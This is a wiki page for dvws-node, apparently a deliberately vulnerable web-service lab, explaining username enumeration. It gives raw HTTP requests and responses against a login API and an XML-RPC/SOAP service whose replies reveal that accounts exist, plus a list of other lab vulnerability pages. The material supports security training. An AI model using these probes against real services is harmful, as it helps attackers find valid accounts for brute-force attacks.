-
Notifications
You must be signed in to change notification settings - Fork 178
User Enumeration
Sam Sanoop edited this page Aug 7, 2021
·
3 revisions
Username enumeration is an reconnaissance attack activity in which an attacker tries to retrieve valid usernames from a API/application which can be used to conduct a brute force attack. Areas within an application most vulnerable to this type of attack are login pages, registration pages or password reset pages.
Multiple areas within dvws-node allows enumeration of usernames.
- Login API
POST /api/v2/users HTTP/1.1
Host: dvws.local
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: application/json, text/plain, */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 30
Origin: http://target.local
Connection: close
Referer: http://target.local/
username=test&password=testsss
HTTP/1.1 409 Conflict
X-Powered-By: Express
Access-Control-Allow-Origin: http://target.local
Vary: Origin
Access-Control-Allow-Credentials: true
Cache-Control: no-store, no-cache, must-revalidate, private
Content-Type: text/plain
Date: Sat, 07 Aug 2021 22:36:00 GMT
Connection: close
Content-Length: 24
User test already exists
- XML-RPC Service
POST /dvwsuserservice/ HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4164.0 Safari/537.36 autochrome/red
Connection: close
SOAPAction: Username
Content-Type: text/xml;charset=UTF-8
Host: dvws.local
Content-Length: 469
<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:urn="urn:examples:usernameservice">
<soapenv:Header/>
<soapenv:Body>
<urn:Username soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<username xsi:type="xsd:string">foobar</username>
</urn:Username>
</soapenv:Body>
</soapenv:Envelope>
HTTP/1.1 200 OK
X-Powered-By: Express
Content-Type: application/xml; charset=utf-8
Content-Length: 533
ETag: W/"215-4nRSSCqxxAg/myMHLU8p7f/9Ezo"
Date: Fri, 05 Jun 2020 23:54:38 GMT
Connection: close
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:urn="urn:examples:helloservice">
<soapenv:Header/>
<soapenv:Body>
<urn:UsernameResponse soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<username xsi:type="xsd:string">User Exists:foobar</username>
</urn:UsernameResponse>
</soapenv:Body>
</soapenv:Envelope>
- XML External Entity Injection
- Server Side Request Forgery (SSRF)
- Username Enumeration
- NoSQL Injection
- Insecure Direct Object Reference
- Mass Assignment
- Cross Site Scripting (XSS)
- Hidden API Functionality Exposure
- SQL Injection
- Information Disclosure
- Insecure PostMessage Configuration
- Command Injection
- Prototype Pollution
- JSON Hijacking
- XPath Injection
- Cross Origin Resource-Sharing Misonfiguration
- JWT Secret Key Brute Force
- Vertical Access Control
- Horizontal Access Control
- Open Redirect
- Path Traversal
- Unsafe Deserialization
- Sensitive Data Exposure
- Arbitrary File Write
- Introspection Enabled
- GraphQL Access Control Issues
- GraphQL Batching Brute Force
- Client Side Template Injection